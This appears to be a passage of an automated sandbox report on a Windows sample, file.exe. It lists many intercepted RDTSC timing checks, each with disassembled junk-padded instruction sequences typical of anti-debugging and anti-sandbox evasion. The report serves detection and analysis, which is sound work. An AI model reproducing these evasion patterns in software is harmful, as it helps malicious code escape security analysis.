                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253A3F second address: 1253A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253E9C second address: 1253EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258AD6 second address: 1258AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3FAC81C964h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126386D second address: 126387B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263F8B second address: 1263F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264105 second address: 1264123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126427A second address: 126427E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126427E second address: 1264291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3FACC550DAh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264963 second address: 1264969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264969 second address: 1264979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264979 second address: 1264985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264985 second address: 1264994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264994 second address: 1264998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12650D6 second address: 1265110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FACC550D6h 0x0000000a je 00007F3FACC550D6h 0x00000010 popad 0x00000011 jmp 00007F3FACC550DEh 0x00000016 push edi 0x00000017 jmp 00007F3FACC550E8h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A88A second address: 126A899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A899 second address: 126A8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3FACC550D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A8A4 second address: 126A8AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F3FAC81C95Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A9E1 second address: 126A9F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3FACC550D6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A9F7 second address: 126A9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1275E7E second address: 1275EAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F3FACC550DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3FACC550DDh 0x00000010 push edi 0x00000011 jo 00007F3FACC550DEh 0x00000017 jnc 00007F3FACC550D6h 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C2EC second address: 127C30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F3FAC81C962h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C30B second address: 127C30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128E99A second address: 128E9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jc 00007F3FAC81C956h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12940D4 second address: 1294118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3FACC550E3h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push esi 0x00000011 jg 00007F3FACC550D6h 0x00000017 jmp 00007F3FACC550DCh 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294118 second address: 129411C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129411C second address: 1294120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12943EB second address: 12943EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12943EF second address: 12943F9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3FACC550D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296A91 second address: 1296AA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F3FAC81C956h 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296AA4 second address: 1296ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3FACC550D6h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F3FACC550EAh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296ABA second address: 1296AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296AC0 second address: 1296AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BC0B second address: 129BC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FAC81C95Eh 0x0000000a pushad 0x0000000b jmp 00007F3FAC81C966h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B917 second address: 129B921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FACC550D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B921 second address: 129B948 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3FAC81C956h 0x00000008 jmp 00007F3FAC81C95Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F3FAC81C95Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B948 second address: 129B97D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FACC550DCh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F3FACC550E6h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 jbe 00007F3FACC550D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8D3B second address: 12B8D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8D41 second address: 12B8D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8D47 second address: 12B8D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8D54 second address: 12B8D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8BC8 second address: 12B8BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8BCC second address: 12B8BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8BD2 second address: 12B8BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8BD8 second address: 12B8BDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8BDD second address: 12B8BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAD32 second address: 12BAD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAD36 second address: 12BAD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAD3C second address: 12BAD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FACC550E3h 0x00000009 jmp 00007F3FACC550E5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDE77 second address: 12BDE7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDE7B second address: 12BDE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FACC550D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F3FACC550DEh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF456 second address: 12BF460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3FAC81C956h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF460 second address: 12BF466 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF466 second address: 12BF46B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF46B second address: 12BF498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550E4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F3FACC550E1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFB7B second address: 12CFB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F3FAC81C95Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFB8F second address: 12CFBB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F3FACC550E4h 0x00000010 jmp 00007F3FACC550DEh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFBB7 second address: 12CFBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C960h 0x00000009 popad 0x0000000a jmp 00007F3FAC81C95Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFBDC second address: 12CFBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8E3 second address: 12CE8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8E7 second address: 12CE901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE901 second address: 12CE90C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F3FAC81C956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE90C second address: 12CE953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jnp 00007F3FACC5512Eh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F3FACC550E8h 0x00000015 ja 00007F3FACC550D6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3FACC550E4h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEBF0 second address: 12CEC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3FAC81C967h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F3FAC81C969h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jo 00007F3FAC81C956h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEC36 second address: 12CEC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3FACC550DEh 0x0000000b push edi 0x0000000c pop edi 0x0000000d jg 00007F3FACC550D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEDBF second address: 12CEDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3FAC81C956h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEF52 second address: 12CEF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEF56 second address: 12CEF7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F3FAC81C956h 0x00000014 jmp 00007F3FAC81C960h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEF7A second address: 12CEF84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEF84 second address: 12CEF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CEF88 second address: 12CEFB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F3FACC550DEh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF280 second address: 12CF2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C969h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007F3FAC81C967h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF3FE second address: 12CF420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3FACC550E0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF420 second address: 12CF424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF55B second address: 12CF55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF55F second address: 12CF584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C966h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F3FAC81C956h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF584 second address: 12CF5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F3FACC550DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3FACC550E3h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF5B0 second address: 12CF5BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF5BE second address: 12CF5C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF8C0 second address: 12CF8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF8C6 second address: 12CF8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2C79 second address: 12D2C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2C90 second address: 12D2C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2C95 second address: 12D2CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FAC81C965h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2CB9 second address: 12D2CC6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2CC6 second address: 12D2CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C95Ch 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5DD7 second address: 12D5DE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5DE1 second address: 12D5DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5DE9 second address: 12D5DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3FACC550D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5DF5 second address: 12D5DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5DF9 second address: 12D5E39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F3FACC550E9h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5E39 second address: 12D5E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3FAC81C956h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5E43 second address: 12D5E64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F3FACC550EFh 0x0000000c jmp 00007F3FACC550E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5957 second address: 12D595B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D595B second address: 12D5990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DCh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F3FACC550E7h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jnp 00007F3FACC550D6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
